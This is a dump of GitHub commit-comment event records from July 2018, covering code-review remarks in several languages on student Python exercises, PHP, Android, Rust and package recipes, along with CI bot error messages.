{"id":"7922818005","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29605536,"position":null,"line":null,"path":null,"commit_id":"534acf0b9ac3f0f8f40b9eee8ce7ea076856e39c","created_at":"2018-07-05T12:12:33Z","updated_at":"2018-07-05T12:12:33Z","author_association":"NONE","body":"ちょっと細かいですが、\r\nrateに(1 - 0.1)を代入しています。個人的にはこれは「割引率」というより\r\n「割り引いた結果の率」と思います。\r\n計算結果的にはOKです。"}},"created_at":"2018-07-05T12:12:33Z"}
{"id":"7922820070","type":"CommitCommentEvent","actor":{"login":"LauraSKR"},"repo":{"name":"LauraSKR/git_test"},"payload":{"comment":{"id":29605540,"position":null,"line":null,"path":null,"commit_id":"030ecaf30be5a77297f2fdd0cfd80f215ea32c52","created_at":"2018-07-05T12:12:59Z","updated_at":"2018-07-05T12:12:59Z","author_association":"OWNER","body":"ok, let's celebrate then"}},"created_at":"2018-07-05T12:12:59Z"}
{"id":"7922820564","type":"CommitCommentEvent","actor":{"login":"diversys"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29605541,"position":null,"line":null,"path":null,"commit_id":"c1b8433e3e6b76316eae97b98e6a37c32e12bb2e","created_at":"2018-07-05T12:13:06Z","updated_at":"2018-07-05T12:13:06Z","author_association":"MEMBER","body":"According to HaikuUser on IRC libreoffice installation fails with error nothing provides lib:libxcb>=1.12 needed by libreoffice-6.2.0.0-git7. Probably need to bump revision in LO recipe?"}},"created_at":"2018-07-05T12:13:06Z"}
{"id":"7922823969","type":"CommitCommentEvent","actor":{"login":"remcogerlich"},"repo":{"name":"nens/cookiecutter-djangosite-template"},"payload":{"comment":{"id":29605546,"position":15,"line":14,"path":"Pipfile","commit_id":"e348a567f3a3fde1b39949f64e01422174829389","created_at":"2018-07-05T12:13:47Z","updated_at":"2018-07-05T12:13:47Z","author_association":"NONE","body":"Moet deze vast staan? 3.7 is net uit. Of is dit alleen voor tijdens het draaien van cookiecutter?"}},"created_at":"2018-07-05T12:13:47Z"}
{"id":"7922824126","type":"CommitCommentEvent","actor":{"login":"m-vo"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29605547,"position":7,"line":61,"path":"src/Resources/contao/classes/DropZone.php","commit_id":"a87b6466dca4ac4b7842e91dce6acf440fc7b411","created_at":"2018-07-05T12:13:49Z","updated_at":"2018-07-05T12:13:49Z","author_association":"NONE","body":"Would this work? I think `json_encode()` adds extra hypens:\r\n\r\n```PHP\r\nvar_dump(str_replace('\"', '\\\\\"', 'This is a \"test\".')); // string(19) \"This is a \\\"test\\\".\" \r\nvar_dump(json_encode('This is a \"test\".'));             // string(21) \"\"This is a \\\"test\\\".\"\" \r\n```"}},"created_at":"2018-07-05T12:13:49Z"}
{"id":"7922824199","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605548,"position":56,"line":111,"path":"examples_tests/28.Benchmark/main.cpp","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:13:50Z","updated_at":"2018-07-05T12:13:50Z","author_association":"NONE","body":"actually put the timer query in the frame loop, just add the results together.\r\n\r\nmeasure from before the buffer update (incl. the fence wait) to the end of anything to do with the buffer (line 148 or so)."}},"created_at":"2018-07-05T12:13:50Z"}
{"id":"7922825769","type":"CommitCommentEvent","actor":{"login":"mostaphaRoudsari"},"repo":{"name":"ladybug-tools/ladybug"},"payload":{"comment":{"id":29605551,"position":null,"line":null,"path":null,"commit_id":"b4bbe490f5131747d88599d38d274939b05da187","created_at":"2018-07-05T12:14:10Z","updated_at":"2018-07-05T12:14:10Z","author_association":"MEMBER","body":"> In fact, I am now concerned that HB+ annual simulations might be using the wrong direct sun positions since they might all be shifted by a half hour from the sun position that actually corresponds with the illuminance for that time. \r\n\r\nSun position is calculated based on input hoy and corresponding weather data doesn't make any difference in the sun position. If I understand correctly you are concerned about matching the radiation values with sun positions and not the position itself. In that case we are currently following what epw2wea does. As you suggested let's discuss and see what's the best approach to match EPW 1-24 with ladybug's 0-23."}},"created_at":"2018-07-05T12:14:10Z"}
{"id":"7922829241","type":"CommitCommentEvent","actor":{"login":"ajrhacker"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29605562,"position":null,"line":null,"path":null,"commit_id":"790009096b58d6554720fdaa657d8035e0774263","created_at":"2018-07-05T12:14:55Z","updated_at":"2018-07-05T12:14:55Z","author_association":"CONTRIBUTOR","body":"If you look closely, you'll see that the reinstated finder for `m_docram` is now `required_shared_ptr<uint8_t>` rather than `required_memory_region`. Inlining a 64K array within a driver class just seemed a bit ridiculous to me."}},"created_at":"2018-07-05T12:14:55Z"}
{"id":"7922829968","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29605564,"position":66,"line":69,"path":"main/src/addins/CSharpBinding/MonoDevelop.CSharp.Formatting/CSharpTextPasteHandler.cs","commit_id":"a946a6ef6255e9b9f7400f015781e9a487d5b3f6","created_at":"2018-07-05T12:15:05Z","updated_at":"2018-07-05T12:15:05Z","author_association":"MEMBER","body":"What about interpolated strings?"}},"created_at":"2018-07-05T12:15:05Z"}
{"id":"7922830017","type":"CommitCommentEvent","actor":{"login":"petschki"},"repo":{"name":"plone/buildout.coredev"},"payload":{"comment":{"id":29605565,"position":7,"line":320,"path":"versions.cfg","commit_id":"98065709b1c12845f5c77f90838f4b99f5d326be","created_at":"2018-07-05T12:15:06Z","updated_at":"2018-07-05T12:15:06Z","author_association":"MEMBER","body":"well ... I wanted to ask before, how the versioning should be handled .... plone.tiles is `2.1` but plone.app.tiles is `3.1.0` ... should there be a zero at third place in general or not ?"}},"created_at":"2018-07-05T12:15:06Z"}
{"id":"7922831985","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29605571,"position":8,"line":22,"path":"examples_tests/28.Benchmark/vs0","commit_id":"3101145ce6d50b8b1dee0f4d4541edc2425cc311","created_at":"2018-07-05T12:15:30Z","updated_at":"2018-07-05T12:15:30Z","author_association":"NONE","body":"maybe use something less expensive than sin, try `inverseqsrt` or something like that"}},"created_at":"2018-07-05T12:15:30Z"}
{"id":"7922835561","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29605577,"position":91,"line":130,"path":"src/broadcast.rs","commit_id":"f45e1997f7febd8bd27f2c7b237d161e904aca0d","created_at":"2018-07-05T12:16:15Z","updated_at":"2018-07-05T12:16:15Z","author_association":"CONTRIBUTOR","body":"You could move that expression to the top of the loop, then we wouldn't even need the `mut next_message`, I think?\r\nI.e. `while let Some(…) = nodes.iter_mut()…`."}},"created_at":"2018-07-05T12:16:15Z"}
{"id":"7922837249","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29605582,"position":null,"line":null,"path":null,"commit_id":"d8a7dedc83042c5a643195172830acf78f2e59ff","created_at":"2018-07-05T12:16:35Z","updated_at":"2018-07-05T12:16:35Z","author_association":"MEMBER","body":"@drott, please apply this and remove HB_NO_MMAP, I think we like to have harfbuzz untouched as far as possible. We like to setup some win-clang bot also but thats for future I guess."}},"created_at":"2018-07-05T12:16:35Z"}
{"id":"7922839246","type":"CommitCommentEvent","actor":{"login":"jensens"},"repo":{"name":"plone/buildout.coredev"},"payload":{"comment":{"id":29605585,"position":7,"line":320,"path":"versions.cfg","commit_id":"98065709b1c12845f5c77f90838f4b99f5d326be","created_at":"2018-07-05T12:16:58Z","updated_at":"2018-07-05T12:16:58Z","author_association":"MEMBER","body":"it does not matter for setuptools: 2.1 is equivalent to 2.1.0"}},"created_at":"2018-07-05T12:16:58Z"}
{"id":"7922842429","type":"CommitCommentEvent","actor":{"login":"drott"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29605590,"position":null,"line":null,"path":null,"commit_id":"d8a7dedc83042c5a643195172830acf78f2e59ff","created_at":"2018-07-05T12:17:38Z","updated_at":"2018-07-05T12:17:38Z","author_association":"COLLABORATOR","body":"Thanks for fixing. I'll do that after the next release, there is no hurry to remove the DEFINE for now, as this code is not used anyway."}},"created_at":"2018-07-05T12:17:38Z"}
{"id":"7922842964","type":"CommitCommentEvent","actor":{"login":"petschki"},"repo":{"name":"plone/buildout.coredev"},"payload":{"comment":{"id":29605592,"position":7,"line":320,"path":"versions.cfg","commit_id":"98065709b1c12845f5c77f90838f4b99f5d326be","created_at":"2018-07-05T12:17:45Z","updated_at":"2018-07-05T12:17:45Z","author_association":"MEMBER","body":"ah ... good to know ... thx"}},"created_at":"2018-07-05T12:17:45Z"}
{"id":"7922848241","type":"CommitCommentEvent","actor":{"login":"RanPollak"},"repo":{"name":"simonswine/kube-latency"},"payload":{"comment":{"id":29605603,"position":null,"line":null,"path":null,"commit_id":"5223042c2d84a9446a7888ca087a73045ef5a98e","created_at":"2018-07-05T12:18:50Z","updated_at":"2018-07-05T12:18:50Z","author_association":"NONE","body":"Got the same here !"}},"created_at":"2018-07-05T12:18:50Z"}
{"id":"7922848935","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29605606,"position":null,"line":null,"path":null,"commit_id":"3507c0b21529cdce8ac09537a8cce195a35d2c45","created_at":"2018-07-05T12:18:58Z","updated_at":"2018-07-05T12:18:58Z","author_association":"NONE","body":"hanaya-var.py\r\n講義中にもちょこっと触れましたが、「割引率」は\r\n「値引きする割合の比率」なので、教科書もですが、コメントと実際の値が\r\n一致していないと思います。\r\n\r\nコード中に書くコメントとコードの意味が一致しているかを少し意識してみると\r\nよりベターです。"}},"created_at":"2018-07-05T12:18:58Z"}
{"id":"7922856640","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"maksGunner/VelloProject"},"payload":{"comment":{"id":29605625,"position":null,"line":null,"path":null,"commit_id":"69180201d928fee4661cd4c8eaaa830d6591de71","created_at":"2018-07-05T12:20:33Z","updated_at":"2018-07-05T12:20:33Z","author_association":"NONE","body":"qq"}},"created_at":"2018-07-05T12:20:33Z"}
{"id":"7922859509","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29605631,"position":null,"line":null,"path":null,"commit_id":"15389586d9b36fa548a3adab5681b6f96cf90daa","created_at":"2018-07-05T12:21:08Z","updated_at":"2018-07-05T12:21:08Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/Ewbvmir0Qi-7BkGpiYtxyA\",\n            \"queue:schedule-task:taskcluster-github/Ewbvmir0Qi-7BkGpiYtxyA/Ewbvmir0Qi-7BkGpiYtxyA\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/Ewbvmir0Qi-7BkGpiYtxyA\",\n                \"queue:schedule-task:taskcluster-github/Ewbvmir0Qi-7BkGpiYtxyA/Ewbvmir0Qi-7BkGpiYtxyA\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-05T12:21:08.111Z\n\n</details>"}},"created_at":"2018-07-05T12:21:08Z"}
{"id":"7922863682","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":29605642,"position":405,"line":405,"path":"main/src/addins/CSharpBinding/MonoDevelop.CSharp.Formatting/CSharpTextPasteHandler.TextPasteUtils.cs","commit_id":"a946a6ef6255e9b9f7400f015781e9a487d5b3f6","created_at":"2018-07-05T12:21:58Z","updated_at":"2018-07-05T12:21:58Z","author_association":"MEMBER","body":"Interesting, looked over the source code for this overload:\r\nhttp://source.dot.net/#System.Private.CoreLib/shared/System/String.Manipulation.cs,630a858d9b6f4c5d\r\n\r\nI'm wondering if we could avoid allocations for the case where we don't have anything to escape."}},"created_at":"2018-07-05T12:21:58Z"}
{"id":"7922867066","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29605647,"position":null,"line":null,"path":null,"commit_id":"58a0381d4eb9f36d2716a2f287a0f23f608e4f83","created_at":"2018-07-05T12:22:36Z","updated_at":"2018-07-05T12:22:36Z","author_association":"NONE","body":"hanaya-var.py\r\n代入のイコールの前後や演算子(+, -, *)の前後はスペースを入れたほうが綺麗なコードになります。\r\nちょっと意識してみてください。"}},"created_at":"2018-07-05T12:22:36Z"}
{"id":"7922896990","type":"CommitCommentEvent","actor":{"login":"MrPlusGH"},"repo":{"name":"MrPlusGH/NPlusMiner"},"payload":{"comment":{"id":29605735,"position":null,"line":null,"path":null,"commit_id":"c59a74ffc9d031e2d5f520407f2a896cd80a3ac9","created_at":"2018-07-05T12:28:51Z","updated_at":"2018-07-05T12:28:51Z","author_association":"OWNER","body":"Stupid mistakes.\r\nNow reloads dot sourced correctly."}},"created_at":"2018-07-05T12:28:51Z"}
{"id":"7922901184","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29605742,"position":null,"line":null,"path":null,"commit_id":"5c9302b5d9980bdaeff7ffb304cae90275f53355","created_at":"2018-07-05T12:29:40Z","updated_at":"2018-07-05T12:29:40Z","author_association":"NONE","body":"修正の必要はありませんが、ソースファイル名が指示と異なりますので、\r\n今後は指示通りでお願いしますね。\r\n\r\nまた、ちょっと細かいですが、\r\nrateに(1 - 0.1)を代入しています。個人的にはこれは「割引率」というより\r\n「割り引いた結果の率」と思います。\r\n計算結果的にはOKです。"}},"created_at":"2018-07-05T12:29:40Z"}
{"id":"7922901208","type":"CommitCommentEvent","actor":{"login":"YahiaAngelo"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29605743,"position":null,"line":null,"path":null,"commit_id":"c2a89bc69a3af9e8aa6d37f1fdaa16e3f6dc4514","created_at":"2018-07-05T12:29:40Z","updated_at":"2018-07-05T12:29:40Z","author_association":"NONE","body":"Why would u add all of this to all Activities??!!\r\nU can modify WordAdapter class only by adding this : \r\n\r\n`listItemView.setOnClickListener(new View.OnClickListener() {\r\n            @Override\r\n            public void onClick(View view) {\r\n                MediaPlayer mediaPlayer = MediaPlayer.create(getContext(), currentWord.getAudioResourceId());\r\n                mediaPlayer.start();\r\n                mediaPlayer.setOnCompletionListener(new MediaPlayer.OnCompletionListener() {\r\n                    @Override\r\n                    public void onCompletion(MediaPlayer mediaPlayer) {\r\n                        mediaPlayer.release();\r\n                    }\r\n                });\r\n            }\r\n        });`"}},"created_at":"2018-07-05T12:29:40Z"}
{"id":"7922902570","type":"CommitCommentEvent","actor":{"login":"Silentttttt"},"repo":{"name":"nebulasio/go-nebulas"},"payload":{"comment":{"id":29605751,"position":17,"line":555,"path":"nf/nvm/blockchain.go","commit_id":"87eae4506da3f097f756a782347e73303f54d336","created_at":"2018-07-05T12:29:56Z","updated_at":"2018-07-05T12:29:56Z","author_association":"CONTRIBUTOR","body":"最外层会根据错误码和result生成返回结果，这里应该不要把err打印进去"}},"created_at":"2018-07-05T12:29:56Z"}
{"id":"7922904625","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29605761,"position":null,"line":null,"path":null,"commit_id":"5c9302b5d9980bdaeff7ffb304cae90275f53355","created_at":"2018-07-05T12:30:20Z","updated_at":"2018-07-05T12:30:20Z","author_association":"NONE","body":"コミットが1ファイルごとに分かれていますが、今後は1回の講義で\r\n対象の複数ファイルをまとめてコミットでいいですよ。"}},"created_at":"2018-07-05T12:30:20Z"}
{"id":"7922909664","type":"CommitCommentEvent","actor":{"login":"alpeshjoshiaj"},"repo":{"name":"alpeshjoshiaj/KAJ"},"payload":{"comment":{"id":29605776,"position":null,"line":null,"path":null,"commit_id":"0db29952d96cf979883dbc188b286980c1b4b38c","created_at":"2018-07-05T12:31:20Z","updated_at":"2018-07-05T12:31:20Z","author_association":"OWNER","body":"Hey \r\nDo you know"}},"created_at":"2018-07-05T12:31:20Z"}
{"id":"7922913991","type":"CommitCommentEvent","actor":{"login":"zhuliting"},"repo":{"name":"gxchain/gxb-core"},"payload":{"comment":{"id":29605784,"position":null,"line":null,"path":null,"commit_id":"1bb61fe9e25bb4bb4550d414e7bec7b0efde4ad5","created_at":"2018-07-05T12:32:11Z","updated_at":"2018-07-05T12:32:11Z","author_association":"COLLABORATOR","body":"@luozhaohui \r\n\r\nyeah, thank you!"}},"created_at":"2018-07-05T12:32:11Z"}
{"id":"7922916790","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29605787,"position":null,"line":null,"path":null,"commit_id":"c0838ddfc049a47f302c6275f85fb38daae073a4","created_at":"2018-07-05T12:32:44Z","updated_at":"2018-07-05T12:32:44Z","author_association":"MEMBER","body":"@AdSchellevis please double-check my puny attempts to understand this :)\r\n\r\nIn a multi-selected model relation field we had a \"none\" selection which wouldn't save but could be selected. I concluded it was for single-select to avoid selecting items when optional. Not sure if the if-logic is 100% correct now, but better at least."}},"created_at":"2018-07-05T12:32:44Z"}
{"id":"7922917705","type":"CommitCommentEvent","actor":{"login":"luriel-xyz"},"repo":{"name":"luriel-xyz/Tekfix"},"payload":{"comment":{"id":29605790,"position":null,"line":null,"path":null,"commit_id":"dcca306748f606eddd1b12c75093c5f062439d83","created_at":"2018-07-05T12:32:55Z","updated_at":"2018-07-05T12:32:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Welcome Screen](https://trello.com/c/1xOKQzKK/3-welcome-screen)"}},"created_at":"2018-07-05T12:32:55Z"}
{"id":"7922917729","type":"CommitCommentEvent","actor":{"login":"memoibish"},"repo":{"name":"power-coders/wp-powercoders-theme"},"payload":{"comment":{"id":29605791,"position":22,"line":14,"path":"index.php","commit_id":"8dadf0c34a97f742acb7f4b122f8d890b7a5703a","created_at":"2018-07-05T12:32:55Z","updated_at":"2018-07-05T12:32:55Z","author_association":"COLLABORATOR","body":"<div class=\"hero\">\r\n    <?php $image = get_field('hero_image'); ?>\r\n    <img src=\"<?php echo $image['url']; ?>\" alt=\"<?php echo $image['alt']; ?>\" />\r\n</div> \r\ncan we use this code with ACF ??\r\n"}},"created_at":"2018-07-05T12:32:55Z"}
{"id":"7922917843","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"jasonwynn10/MiniBosses"},"payload":{"comment":{"id":29605793,"position":null,"line":null,"path":null,"commit_id":"a1571bd43fcec3e8a963e5cc2a012d0985849eb9","created_at":"2018-07-05T12:32:57Z","updated_at":"2018-07-05T12:32:57Z","author_association":"NONE","body":"@jasonwynn10\r\noops sorry "}},"created_at":"2018-07-05T12:32:57Z"}
{"id":"7922918353","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29605794,"position":null,"line":null,"path":null,"commit_id":"dee570d906f8d1a82cf6c08d69e98b29d97eb758","created_at":"2018-07-05T12:33:03Z","updated_at":"2018-07-05T12:33:03Z","author_association":"NONE","body":"それぞれ商品の合計でなく、単価と数量、割引率をそれぞれ変数にしてください。\r\nそれと、ポイント割引分が反映されていないので、要求に対して不正解です。\r\n\r\n提出期限まで修正してOKですので、修正して再度add/commit/pushしてみてください。"}},"created_at":"2018-07-05T12:33:03Z"}
{"id":"7922921533","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29605799,"position":null,"line":null,"path":null,"commit_id":"c1b8433e3e6b76316eae97b98e6a37c32e12bb2e","created_at":"2018-07-05T12:33:41Z","updated_at":"2018-07-05T12:33:41Z","author_association":"MEMBER","body":"Hmm, let me also revbump a few other (smaller) recipes before libreoffice, otherwise these other recipes will have to wait for several hours before the buildbots start building them :)\r\n```\r\nx11-libs/libxpm/libxpm-3.5.11.recipe\r\nx11-libs/libxpm/libxpm-3.5.12.recipe\r\nx11-libs/libx11/libx11-1.6.5.recipe\r\napp-editors/retext/retext-7.0.1.recipe\r\nx11-libs/libfm-qt/libfm_qt-0.13.0.recipe\r\nx11-misc/pcmanfm-qt/pcmanfm_qt-0.13.0.recipe\r\n```"}},"created_at":"2018-07-05T12:33:41Z"}
{"id":"7922922788","type":"CommitCommentEvent","actor":{"login":"YahiaAngelo"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29605801,"position":null,"line":null,"path":null,"commit_id":"c2a89bc69a3af9e8aa6d37f1fdaa16e3f6dc4514","created_at":"2018-07-05T12:33:56Z","updated_at":"2018-07-05T12:33:56Z","author_association":"NONE","body":"You can do this with editing WordAdapter class only by adding this : \r\n\r\n`        int color = ContextCompat.getColor(getContext(), colorValue);\r\n        listItemView.setBackgroundColor(color);\r\n        //Add OnClickListener to all items views\r\n        listItemView.setOnClickListener(new View.OnClickListener() {\r\n            @Override\r\n            public void onClick(View view) {\r\n                MediaPlayer mediaPlayer = MediaPlayer.create(getContext(), currentWord.getAudioResourceId());\r\n                mediaPlayer.start();\r\n                //Release the media player after it finishes playing\r\n                mediaPlayer.setOnCompletionListener(new MediaPlayer.OnCompletionListener() {\r\n                    @Override\r\n                    public void onCompletion(MediaPlayer mediaPlayer) {\r\n                        mediaPlayer.release();\r\n                    }\r\n                });\r\n            }\r\n        });`"}},"created_at":"2018-07-05T12:33:56Z"}
{"id":"7922923162","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29605803,"position":null,"line":null,"path":null,"commit_id":"59f17d6e0550bf63a0b6ef182e2d63474e058ede","created_at":"2018-07-05T12:34:01Z","updated_at":"2018-07-05T12:34:01Z","author_association":"CONTRIBUTOR","body":"👍"}},"created_at":"2018-07-05T12:34:01Z"}
{"id":"7922924617","type":"CommitCommentEvent","actor":{"login":"itssyenny"},"repo":{"name":"itssyenny/lucksparkling.github.io"},"payload":{"comment":{"id":29605804,"position":null,"line":null,"path":null,"commit_id":"52de69212fc66a0c51d5be2012def8e6ed5d222d","created_at":"2018-07-05T12:34:19Z","updated_at":"2018-07-05T12:34:19Z","author_association":"OWNER","body":"r"}},"created_at":"2018-07-05T12:34:19Z"}
{"id":"7922925118","type":"CommitCommentEvent","actor":{"login":"luriel-xyz"},"repo":{"name":"luriel-xyz/Tekfix"},"payload":{"comment":{"id":29605805,"position":null,"line":null,"path":null,"commit_id":"dcca306748f606eddd1b12c75093c5f062439d83","created_at":"2018-07-05T12:34:25Z","updated_at":"2018-07-05T12:34:25Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Welcome Screen](https://trello.com/c/1xOKQzKK/3-welcome-screen)"}},"created_at":"2018-07-05T12:34:25Z"}
{"id":"7922926336","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29605810,"position":null,"line":null,"path":null,"commit_id":"f5b3518a1478073d0012467bdf27bee7fd6b1b5f","created_at":"2018-07-05T12:34:40Z","updated_at":"2018-07-05T12:34:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [015 - Desenvolver Classe Cidade Service](https://trello.com/c/nLK5NYtw/20-015-desenvolver-classe-cidade-service)"}},"created_at":"2018-07-05T12:34:40Z"}
{"id":"7922926505","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29605812,"position":null,"line":null,"path":null,"commit_id":"feb97a0180531fa77818156ac398ebb1d6d1c9c3","created_at":"2018-07-05T12:34:42Z","updated_at":"2018-07-05T12:34:42Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> set -x && set -e && set -o pipefail && cd /tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node && pdd -v -f /tmp/20180705-3331-10ezgca [1]: bash: warning: setlocale: LC_ALL: cannot change locale (UTF-8) + set -e + set -o pipefail + cd /tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node + pdd -v -f...\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nUserError\nset -x && set -e && set -o pipefail && cd /tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node && pdd -v -f /tmp/20180705-3331-10ezgca [1]:\nbash: warning: setlocale: LC_ALL: cannot change locale (UTF-8)\n+ set -e\n+ set -o pipefail\n+ cd /tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node\n+ pdd -v -f /tmp/20180705-3331-10ezgca\n\nMy version is 0.20.3\nRuby version is 2.3.3 at x86_64-linux\nReading /tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node\n31 file(s) found, 56 excluded\n/tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node/node/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node/test/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node/test/node/__init__.py is a binary file (0 bytes)\n/tmp/0pdd20180705-4-d346fc/DronMDF/zold-lazy-node/zln/__init__.py is a binary file (0 bytes)\nReading zold/time.py...\nReading zold/score.py...\nPuzzle 51-a737775c 0/DEV at zold/score.py\nPuzzle 54-015f6299 0/DEV at zold/score.py\nReading .github/CODEOWNERS...\nReading requirements.txt...\nReading check.sh...\nPuzzle 12-991eb218 0/DEV at check.sh\nPuzzle 9-b47b0f3b 0/DEV at check.sh\nPuzzle 1-01c7a030 0/DEV at check.sh\nReading LICENSE...\nReading node/score.py...\nPuzzle 51-a5ec3281 0/DEV at node/score.py\nPuzzle 51-d4183988 0/DEV at node/score.py\nPuzzle 51-da159903 0/DEV at node/score.py\nPuzzle 41-86a05cf6 0/DEV at node/score.py\nReading node/app.py...\nPuzzle 3-c5db1bb8 0/DEV at node/app.py\nPuzzle 4-8fe4d4f8 0/DEV at node/app.py\nPuzzle 6-71010d54 0/DEV at node/app.py\nPuzzle 7-2bf15792 0/DEV at node/app.py\nReading node/db.py...\nReading .circleci/config.yml...\nReading .gitignore...\nReading test/zold/test_time.py...\nReading test/zold/test_score.py...\nPuzzle 50-ee4c6308 0/DEV at test/zold/test_score.py\nReading test/node/test_front_get_root.py...\nReading test/node/test_put_score.py...\nReading .pylintrc...\nReading zln/zln.py...\nERROR: zln/zln.py; puzzle at line #23; @todo found, but puzzle can't be parsed, most probably because @todo is not followed by a puzzle marker, as this page explains: https://github.com/yegor256/pdd#how-to-format. If you can't understand the cause of this issue or 